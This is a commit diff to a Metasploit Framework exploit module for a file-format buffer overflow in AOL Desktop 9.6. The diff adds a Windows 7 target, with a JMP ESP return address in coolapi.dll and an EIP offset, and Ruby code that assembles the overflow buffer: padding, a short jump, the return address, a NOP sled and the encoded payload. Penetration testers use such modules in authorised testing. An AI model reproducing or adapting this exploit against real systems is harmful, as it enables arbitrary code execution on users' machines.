Added Win 7 target

git-svn-id: file:///home/svn/framework3/trunk@12361 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/fileformat/aol_desktop_linktag.rb

@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'sickn3ss',     #9.6 poc
 					'sinn3r',       #Metasploit
 					'mr_me',        #NX bypass target
+					'silent_dream', #Win 7 target
 				],
 			'References'     =>
 				[
@@ -60,7 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'   => 8000,        #Buffer max. Can be more.
 						},
 					],
-
 					[
 						'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
 						{
@@ -70,6 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'    => 8000,        # Buffer max. Can be more.
 						},
 					],
+					[
+						'AOL Desktop 9.6 on Windows 7',
+						{
+							'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
+							'Offset' => 4327,        # Offset to EIP
+							'Max'    => 8000,        # Buffer max. Can be more
+						}
+					],
 				],
 			'Privileged'	 => false,
 			'DisclosureDate' => "Jan 31 2011",
@@ -85,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		if target.name !~ /SP3 - NX bypass/
+		if target.name =~ /XP SP3$/
 
 			# Compatible with what the poc has, and what I see on my debugger
 			sploit  = ''
@@ -101,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			sploit << payload.encoded
 			sploit << rand_text_alpha(target['Max']-sploit.length)
 
-		else
+		elsif target.name =~ /SP3 - NX bypass$/
 
 			#Thanks mr_me for the ROP chain
 
@@ -173,6 +181,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			#Padding
 			sploit << rand_text_alpha(target['Max']-sploit.length)
 
+		elsif target.name =~ /Windows 7/
+
+			#Thanks silent_dream
+
+			sploit  = ''
+			sploit << rand_text_alpha(target['Offset']-2)
+			sploit << "\xeb\x10"
+			sploit << [target.ret].pack('V')
+			sploit << make_nops(16)
+			sploit << payload.encoded
+			sploit << rand_text_alpha(target['Max'] - sploit.length)
+
 		end
 
 		link_value = rand_text_alpha(6)